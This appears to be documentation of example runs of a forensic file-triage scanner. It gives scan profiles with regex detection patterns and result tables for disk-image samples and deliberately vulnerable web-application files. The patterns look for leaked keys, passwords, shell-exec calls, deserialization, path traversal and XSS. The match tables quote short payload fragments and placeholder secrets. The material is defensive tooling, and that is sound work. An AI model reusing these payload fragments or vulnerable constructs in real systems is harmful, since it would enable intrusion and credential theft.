Other	False	/sample.vhdx/sample.vhdx:vhdx:metadata	0	0	0	[]	Minimal	0	5e1d1fba1cbf19a94ab7bbe9f9ab5b351b58444acac9ceb18024bf1c7b1a3266

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension	is_extracted_file
/README.md	README.md	38a13bd791913971e0ef62805930c72598bd549f7ae1e38d77436111d9c0d0d0	2026-01-31T14:35:39.975936764Z	2026-01-31T14:35:39.976936747Z	2026-01-31T14:36:13.424393908Z	["application/x-genesis-rom"]	0
/sample.vhdx/sample.vhdx:vhdx:metadata	sample.vhdx:vhdx:metadata	5e1d1fba1cbf19a94ab7bbe9f9ab5b351b58444acac9ceb18024bf1c7b1a3266				[]	1
/sample.vhdx	sample.vhdx	a20805a2e25dfc53905a11213b4f184f430d98ec199c8d69267195a5408628ef	2026-01-31T14:35:14.517358468Z	2026-01-31T14:35:14.517358468Z	2026-01-31T14:36:13.425393891Z	["application/x-vhdx"]	0

pattern_matches.csv

id	sha256	pattern_name	match_type	match	location	length
1	38a13bd791913971e0ef62805930c72598bd549f7ae1e38d77436111d9c0d0d0	VHDX Signature	bytes	vhdxfile	461	8
2	38a13bd791913971e0ef62805930c72598bd549f7ae1e38d77436111d9c0d0d0	VHDX Signature	bytes	vhdxfile	1319	8
3	a20805a2e25dfc53905a11213b4f184f430d98ec199c8d69267195a5408628ef	VHDX Signature	bytes	vhdxfile	0	8
4	a20805a2e25dfc53905a11213b4f184f430d98ec199c8d69267195a5408628ef	SSH Private Key	regex	-----BEGIN PRIVATE KEY-----	5:0	27
5	a20805a2e25dfc53905a11213b4f184f430d98ec199c8d69267195a5408628ef	Password in Config	regex	password = MySecretP@ssw0rd!	3:6	28
6	a20805a2e25dfc53905a11213b4f184f430d98ec199c8d69267195a5408628ef	Password in Config	regex	password=secret123	8:49	18
7	a20805a2e25dfc53905a11213b4f184f430d98ec199c8d69267195a5408628ef	Database Connection String	regex	jdbc:postgresql://localhost:5432/mydb?user=admin&password=secret123	8:0	67
8	a20805a2e25dfc53905a11213b4f184f430d98ec199c8d69267195a5408628ef	Email Address	regex	support@company.com	4:0	19

signature_matches.csv

Empty CSV

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
38a13bd791913971e0ef62805930c72598bd549f7ae1e38d77436111d9c0d0d0	b95bf31e3c8f0179d3d0e7adc439d4614d3dbf5f	8e3497f1e335c0a27b92e1efb5dfe42b	2711	text/plain	5.01402600581424
5e1d1fba1cbf19a94ab7bbe9f9ab5b351b58444acac9ceb18024bf1c7b1a3266	32f49b043419c3c9255641b6a29b69b27f7279cf	0bd314dd5a07382a13dd5e2d4e90f5a5	884	text/plain	5.01756054475152
a20805a2e25dfc53905a11213b4f184f430d98ec199c8d69267195a5408628ef	ee47c231473c6d9e380ad793ab47bf29738c6bcd	82bc120398da1622b7b934ff72726884	1048576	application/x-vhdx	0.00541595196467941

Example: vmdk-forensic

Inputs

examples/inputs/vmdk-forensic-samples/README.md
examples/inputs/vmdk-forensic-samples/sample.vmdk

Profile

# VMDK Forensic Image Example Profile
# Demonstrates analysis of VMDK (VMware Virtual Machine Disk) forensic disk images

decode = ["base64"]

max-file-size = 104857600  # 100 MiB

tag = "vmdk-forensic"

# Patterns to match in VMDK images and extracted partitions
[[patterns]]
  name = "VMDK Sparse Signature"
  pattern = "4B:44:4D:56"  # "KDMV" at header (sparse/stream-optimized)
  type = "bytes"

[[patterns]]
  name = "VMDK COWD Signature"
  pattern = "43:4F:57:44"  # "COWD" at header (snapshot)
  type = "bytes"

[[patterns]]
  name = "AWS Access Key"
  pattern = "AKIA[0-9A-Z]{16}"
  type = "regex"

[[patterns]]
  name = "AWS Secret Key"
  pattern = "(?i)aws.{0,20}secret.{0,20}['\"][0-9a-zA-Z/+=]{40}['\"]"
  type = "regex"

[[patterns]]
  name = "SSH Private Key"
  pattern = "-----BEGIN.*PRIVATE KEY-----"
  type = "regex"

[[patterns]]
  name = "Password in Config"
  pattern = "password\\s*=\\s*['\"]?[^'\"\\s]+"
  type = "regex"

[[patterns]]
  name = "Database Connection String"
  pattern = "jdbc:[a-zA-Z0-9]+://[^\\s]+password=[^\\s&;]+"
  type = "regex"

[[patterns]]
  name = "MBR Boot Signature"
  pattern = "55:AA"
  type = "bytes"

[[patterns]]
  name = "GPT Signature"
  pattern = "45:46:49:20:50:41:52:54"  # "EFI PART"
  type = "bytes"

[[patterns]]
  name = "NTFS Signature"
  pattern = "4E:54:46:53"  # "NTFS"
  type = "bytes"

[[patterns]]
  name = "Email Address"
  pattern = "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}"
  type = "regex"

Report outputs

Triage report (converted from triage_report.json)

total_files	3
critical_count	0
high_count	0
medium_count	0
low_count	0
minimal_count	3
must_investigate_count	0
all_scores	None
generated_at	2026-01-31T19:49:34.563022216+00:00

top_scores

file_type	must_investigate	path	pattern_count_score	pattern_matches	pattern_severity_score	reasons	risk_level	score	sha256
Other	False	/README.md	5	5	8	["5 suspicious patterns detected"]	Minimal	13	81443cd3c655a4624aa1315c07f6a1e5fbdd083782ccc4cd066dd9d5398431c7
Other	False	/sample.vmdk	5	3	5	["3 suspicious patterns detected"]	Minimal	10	6754517383d7fc7039ad910a3733c409e22dcd2766461a6ef1d8afeeff0ad262
Other	False	/sample.vmdk/sample.vmdk:vmdk:metadata	0	0	0	[]	Minimal	0	a4b361b721699edb3bfacd150a4eeadbb96803f4b1630a2e469d5372d9d94ce6

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension	is_extracted_file
/README.md	README.md	81443cd3c655a4624aa1315c07f6a1e5fbdd083782ccc4cd066dd9d5398431c7	2026-01-31T19:31:14.972192562Z	2026-01-31T19:31:14.973192565Z	2026-01-31T19:31:14.972192562Z	["application/x-genesis-rom"]	0
/sample.vmdk/sample.vmdk:vmdk:metadata	sample.vmdk:vmdk:metadata	a4b361b721699edb3bfacd150a4eeadbb96803f4b1630a2e469d5372d9d94ce6				[]	1
/sample.vmdk	sample.vmdk	6754517383d7fc7039ad910a3733c409e22dcd2766461a6ef1d8afeeff0ad262	2026-01-31T19:31:30.371235129Z	2026-01-31T19:31:30.372235132Z	2026-01-31T19:31:35.403248471Z	["application/x-vmdk"]	0

pattern_matches.csv

id	sha256	pattern_name	match_type	match	location	length
1	81443cd3c655a4624aa1315c07f6a1e5fbdd083782ccc4cd066dd9d5398431c7	VMDK Sparse Signature	bytes	KDMV	488	4
2	81443cd3c655a4624aa1315c07f6a1e5fbdd083782ccc4cd066dd9d5398431c7	VMDK COWD Signature	bytes	COWD	576	4
3	81443cd3c655a4624aa1315c07f6a1e5fbdd083782ccc4cd066dd9d5398431c7	VMDK Sparse Signature	bytes	KDMV	789	4
4	81443cd3c655a4624aa1315c07f6a1e5fbdd083782ccc4cd066dd9d5398431c7	VMDK Sparse Signature	bytes	KDMV	1516	4
5	81443cd3c655a4624aa1315c07f6a1e5fbdd083782ccc4cd066dd9d5398431c7	VMDK COWD Signature	bytes	COWD	1526	4
6	6754517383d7fc7039ad910a3733c409e22dcd2766461a6ef1d8afeeff0ad262	VMDK Sparse Signature	bytes	KDMV	0	4
7	6754517383d7fc7039ad910a3733c409e22dcd2766461a6ef1d8afeeff0ad262	AWS Access Key	regex	AKIATESTKEY123456789	4:0	20
8	6754517383d7fc7039ad910a3733c409e22dcd2766461a6ef1d8afeeff0ad262	Password in Config	regex	password=SecretPass123	5:0	22

signature_matches.csv

Empty CSV

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
81443cd3c655a4624aa1315c07f6a1e5fbdd083782ccc4cd066dd9d5398431c7	6516142a3ebe7341f9ebc076d3f6d68262d8f9bc	fc18f64809df64d5acb3dc86a6d3064e	3010	text/plain	5.06835686185191
a4b361b721699edb3bfacd150a4eeadbb96803f4b1630a2e469d5372d9d94ce6	71a8a220bf2ab90f620f80f091269b57bc2accff	81f7cbcdf39c98d01b6d0bb1944f1691	908	text/plain	4.98473949450813
6754517383d7fc7039ad910a3733c409e22dcd2766461a6ef1d8afeeff0ad262	32846dceaa66f20ef9347460b112b2d7017ba25d	a1303b14db40367d4d4a5fbb21d28913	1048581	application/x-vmdk	0.00150744491163612

Example: web-application

Inputs

examples/inputs/web-application-samples/config.json
examples/inputs/web-application-samples/vulnerable_java_app.java
examples/inputs/web-application-samples/vulnerable_php.php
examples/inputs/web-application-samples/vulnerable_python.py

Profile

# Web Application Profile
# Profile for analyzing web applications (Java, Python, Node.js, etc.)

decode = ["base64", "hex", "percent-encoding", "html-entity", "unicode-escape-sequences"]

max-file-size = 52428800  # 50 MiB

include-path-globs = [
  "**/*.java", "**/*.class", "**/*.jar", "**/*.war", "**/*.ear",
  "**/*.py", "**/*.pyc",
  "**/*.js", "**/*.ts", "**/*.jsx", "**/*.tsx",
  "**/*.php",
  "**/*.rb",
  "**/*.go",
  "**/*.jsp", "**/*.jspx",
  "**/*.html", "**/*.htm",
  "**/*.xml", "**/*.json", "**/*.yaml", "**/*.yml",
  "**/*.config", "**/*.conf", "**/*.properties", "**/*.env"
]

exclude-path-globs = [
  "**/node_modules/**",
  "**/vendor/**",
  "**/.git/**",
  "**/venv/**",
  "**/__pycache__/**",
  "**/target/**",
  "**/build/**",
  "**/dist/**"
]

tag = "web-app"

# SQL Injection Indicators
[[patterns]]
  name = "SQL Statement"
  pattern = "(?:(?:select\\s+\\S.*\\s+from\\s+\\S+)|(?:insert\\s+into\\s+\\S+)|(?:update\\s+\\S+\\s+set\\s+\\S+)|(?:delete\\s+from\\s+\\S+))"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "String Concatenation SQL"
  pattern = "\\+\\s*['\"].*\\s+(AND|OR|WHERE|FROM|SELECT)\\s+"
  type = "regex"
  case-insensitive = true

# Command Injection Indicators
[[patterns]]
  name = "Java Exec"
  pattern = "Runtime\\.getRuntime\\(\\)\\.exec\\("
  type = "regex"

[[patterns]]
  name = "Python os.system"
  pattern = "os\\.system\\("
  type = "regex"

[[patterns]]
  name = "PHP system/exec"
  pattern = "(system|exec|shell_exec|passthru|popen)\\s*\\("
  type = "regex"

# Deserialization Indicators
[[patterns]]
  name = "Java Deserialization"
  pattern = "ObjectInputStream|readObject\\("
  type = "regex"

[[patterns]]
  name = "Python Pickle"
  pattern = "pickle\\.(load|loads)\\("
  type = "regex"

[[patterns]]
  name = "PHP Unserialize"
  pattern = "unserialize\\s*\\("
  type = "regex"

# Path Traversal
[[patterns]]
  name = "Path Traversal"
  pattern = "\\.\\./|\\.\\.%2[fF]|\\.\\.\\\\|%2[eE]%2[eE]%2[fF]"
  type = "regex"

# XSS Indicators
[[patterns]]
  name = "Script Tag"
  pattern = "<script[^>]*>.*</script>"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "Event Handler"
  pattern = "on(click|load|error|mouseover|focus|blur)\\s*="
  type = "regex"
  case-insensitive = true

# Sensitive Data
[[patterns]]
  name = "Debug/Test Credentials"
  pattern = "(debug|test|admin|root)_(password|passwd|pwd|key|secret)"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "Hardcoded Secret"
  pattern = "(secret|token|api_key)\\s*=\\s*['\"][^'\"]{8,}['\"]"
  type = "regex"
  case-insensitive = true

# JWT Tokens
[[patterns]]
  name = "JWT Token"
  pattern = "eyJ[A-Za-z0-9_-]+\\.eyJ[A-Za-z0-9_-]+\\.[A-Za-z0-9_-]+"
  type = "regex"

# Request Handling
[[patterns]]
  name = "Request Parameter"
  pattern = "request\\.getParameter\\(|request\\.GET\\[|\\$_GET\\[|\\$_POST\\[|request\\.form\\["
  type = "regex"

# Signatures
[[signatures]]
  name = "Files with SQL and Parameter Access"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name = 'SQL Statement' AND sha256 IN (SELECT sha256 FROM pattern_matches WHERE pattern_name = 'Request Parameter')"

[[signatures]]
  name = "Files with Multiple Security Issues"
  query = "SELECT sha256, COUNT(DISTINCT pattern_name) as issue_count FROM pattern_matches GROUP BY sha256 HAVING issue_count > 5"

Report outputs

Triage report (converted from triage_report.json)

total_files	5
critical_count	0
high_count	0
medium_count	0
low_count	4
minimal_count	1
must_investigate_count	0
all_scores	None
generated_at	2025-12-03T09:19:43.744986639+00:00

top_scores

file_type	file_type_score	must_investigate	path	pattern_count_score	pattern_matches	pattern_severity_score	reasons	risk_level	score	sha256
Script	20	False	/vulnerable_python.py	15	19	14	["19 suspicious patterns detected"]	Low	49	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146
Other	0	False	/vulnerable_php.php	20	27	16	["27 suspicious patterns detected"]	Low	36	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07
Other	0	False	/vulnerable_java_app.java/vulnerable_java_app.java.percent-encoding	20	26	16	["26 suspicious patterns detected"]	Low	36	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613
Other	0	False	/vulnerable_java_app.java	20	26	16	["26 suspicious patterns detected"]	Low	36	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec
Other	0	False	/config.json	5	3	5	["3 suspicious patterns detected"]	Minimal	10	6716179e4ba5df26510403251df99b01c4fb98437e609bc6411982681662b20e

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension	is_decoded_file
/config.json	config.json	6716179e4ba5df26510403251df99b01c4fb98437e609bc6411982681662b20e	2025-12-03T08:56:20.497889219Z	2025-12-03T08:56:20.497889219Z	2025-12-03T08:56:20.497889219Z	["application/feed+json"]	0
/vulnerable_php.php	vulnerable_php.php	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	2025-12-03T08:56:20.497889219Z	2025-12-03T08:56:20.497889219Z	2025-12-03T08:56:20.497889219Z	[]	0
/vulnerable_python.py	vulnerable_python.py	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146	2025-12-03T08:56:20.497889219Z	2025-12-03T08:56:20.497889219Z	2025-12-03T08:56:20.497889219Z	["text/x-script.python"]	0
/vulnerable_java_app.java/vulnerable_java_app.java.percent-encoding	vulnerable_java_app.java.percent-encoding	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613				[]	1
/vulnerable_java_app.java	vulnerable_java_app.java	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	2025-12-03T08:56:20.497889219Z	2025-12-03T08:56:20.497889219Z	2025-12-03T08:56:20.497889219Z	[]	0

pattern_matches.csv

id	sha256	pattern_name	match_type	match	location	length
1	6716179e4ba5df26510403251df99b01c4fb98437e609bc6411982681662b20e	Debug/Test Credentials	regex	admin_password	4:5	14
2	6716179e4ba5df26510403251df99b01c4fb98437e609bc6411982681662b20e	Debug/Test Credentials	regex	test_key	5:5	8
3	6716179e4ba5df26510403251df99b01c4fb98437e609bc6411982681662b20e	JWT Token	regex	eyJhbGciOiJIUzI1NiJ9.eyJSb2xlIjoiQWRtaW4ifQ.fake_jwt_token_here	11:19	63
4	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	SQL Statement	regex	SELECT * FROM users	15:10	19
5	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	SQL Statement	regex	SELECT name FROM users	16:13	22
6	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	PHP system/exec	regex	system(	7:0	7
7	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	PHP system/exec	regex	exec(	8:0	5
8	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	PHP system/exec	regex	shell_exec(	9:0	11
9	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	PHP system/exec	regex	passthru(	10:0	9
10	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	PHP system/exec	regex	popen(	11:0	6
11	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	PHP Unserialize	regex	unserialize(	20:7	12
12	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	Path Traversal	regex	../	23:9	3
13	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	Path Traversal	regex	../	23:12	3
14	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	Path Traversal	regex	../	23:15	3
15	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	Script Tag	regex	<script>alert('XSS')</script>	27:6	29
16	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	Event Handler	regex	onclick=	28:12	8
17	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	Event Handler	regex	onerror=	34:17	8
18	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	Event Handler	regex	onmouseover=	35:9	12
19	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	Event Handler	regex	onfocus=	36:11	8
20	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	Debug/Test Credentials	regex	admin_secret	48:1	12
21	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	Debug/Test Credentials	regex	admin_password	48:30	14
22	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	Hardcoded Secret	regex	api_key = "sk-abcdef1234567890abcdef1234567890"	47:1	47
23	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	Hardcoded Secret	regex	secret = "super_secret_admin_password_123"	48:7	42
24	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	Request Parameter	regex	$_GET[	6:7	6
25	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	Request Parameter	regex	$_POST[	8:5	7
26	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	Request Parameter	regex	$_GET[	9:19	6
27	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	Request Parameter	regex	$_GET[	11:6	6
28	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	Request Parameter	regex	$_GET[	14:6	6
29	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	Request Parameter	regex	$_GET[	19:8	6
30	c849e87dc3f933873149e29c3f6994fbc6ffba3d11b8b95a1daed2e7705d7d07	Request Parameter	regex	$_GET[	24:8	6
31	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146	SQL Statement	regex	SELECT * FROM users	16:13	19
32	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146	SQL Statement	regex	INSERT INTO audit_log	18:14	21
33	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146	SQL Statement	regex	UPDATE settings SET value	19:14	25
34	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146	SQL Statement	regex	DELETE FROM temp	20:14	16
35	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146	String Concatenation SQL	regex	+ "' WHERE	19:69	11
36	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146	Python os.system	regex	os.system(	28:4	10
37	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146	PHP system/exec	regex	system(	28:7	7
38	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146	Python Pickle	regex	pickle.loads(	37:10	13
39	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146	Path Traversal	regex	../	44:12	3
40	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146	Path Traversal	regex	../	44:15	3
41	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146	Path Traversal	regex	../	44:18	3
42	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146	Debug/Test Credentials	regex	test_password	50:0	13
43	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146	Debug/Test Credentials	regex	admin_key	51:0	9
44	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146	Hardcoded Secret	regex	TOKEN = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.fake"	49:4	74
45	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146	JWT Token	regex	eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.fake	49:13	64
46	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146	Request Parameter	regex	request.form[	15:14	13
47	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146	Request Parameter	regex	request.form[	18:49	13
48	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146	Request Parameter	regex	request.form[	19:47	13
49	63ee97c23b49baa9e28017e8e65e3d6f2bba43722a17d77eb2b737fcce3ca146	Request Parameter	regex	request.form[	20:51	13
50	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	SQL Statement	regex	SELECT * FROM users	18:24	19
51	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	SQL Statement	regex	INSERT INTO logs	20:30	16
52	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	SQL Statement	regex	UPDATE users SET name	21:30	21
53	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	SQL Statement	regex	DELETE FROM sessions	22:30	20
54	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	String Concatenation SQL	regex	+ "' WHERE	21:88	11
55	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	Java Exec	regex	Runtime.getRuntime().exec(	26:8	26
56	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	PHP system/exec	regex	exec(	26:29	5
57	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	Java Deserialization	regex	ObjectInputStream	29:8	17
58	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	Java Deserialization	regex	ObjectInputStream	29:36	17
59	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	Java Deserialization	regex	readObject(	30:25	11
60	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	Path Traversal	regex	../	33:23	3
61	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	Path Traversal	regex	../	33:26	3
62	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	Path Traversal	regex	../	33:29	3
63	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	Path Traversal	regex	../	34:30	3
64	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	Path Traversal	regex	../	34:33	3
65	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	Path Traversal	regex	../	34:36	3
66	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	Script Tag	regex	<script>alert('XSS')</script>	37:38	29
67	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	Debug/Test Credentials	regex	debug_password	42:15	14
68	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	Debug/Test Credentials	regex	test_secret	43:15	11
69	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	Hardcoded Secret	regex	secret = "sk-12345678abcdefghijklmnopqrstuvwxyz12345678"	40:15	56
70	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	Hardcoded Secret	regex	token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"	41:15	165
71	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	Hardcoded Secret	regex	secret = "very_secret_value_12345678"	43:20	37
72	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	JWT Token	regex	eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c	41:24	155
73	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	Request Parameter	regex	request.getParameter(	17:24	21
74	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	Request Parameter	regex	request.getParameter(	21:59	21
75	22308e535c62c1c6a999e772634e1ea58c91a8819490fcb874d0dfc72d9c3613	Request Parameter	regex	request.getParameter(	25:26	21
76	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	SQL Statement	regex	SELECT * FROM users	18:24	19
77	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	SQL Statement	regex	INSERT INTO logs	20:30	16
78	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	SQL Statement	regex	UPDATE users SET name	21:30	21
79	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	SQL Statement	regex	DELETE FROM sessions	22:30	20
80	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	String Concatenation SQL	regex	+ "' WHERE	21:88	11
81	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	Java Exec	regex	Runtime.getRuntime().exec(	26:8	26
82	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	PHP system/exec	regex	exec(	26:29	5
83	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	Java Deserialization	regex	ObjectInputStream	29:8	17
84	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	Java Deserialization	regex	ObjectInputStream	29:36	17
85	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	Java Deserialization	regex	readObject(	30:25	11
86	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	Path Traversal	regex	../	33:23	3
87	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	Path Traversal	regex	../	33:26	3
88	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	Path Traversal	regex	../	33:29	3
89	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	Path Traversal	regex	..%2F	34:30	5
90	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	Path Traversal	regex	..%2F	34:35	5
91	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	Path Traversal	regex	..%2F	34:40	5
92	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	Script Tag	regex	<script>alert('XSS')</script>	37:38	29
93	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	Debug/Test Credentials	regex	debug_password	42:15	14
94	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	Debug/Test Credentials	regex	test_secret	43:15	11
95	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	Hardcoded Secret	regex	secret = "sk-12345678abcdefghijklmnopqrstuvwxyz12345678"	40:15	56
96	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	Hardcoded Secret	regex	token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"	41:15	165
97	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	Hardcoded Secret	regex	secret = "very_secret_value_12345678"	43:20	37
98	b4fb727b949c9f36e108b866d31bb0375941f7665b0e4e4d3007bd2add5621ec	JWT Token	regex	eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c	41:24	155
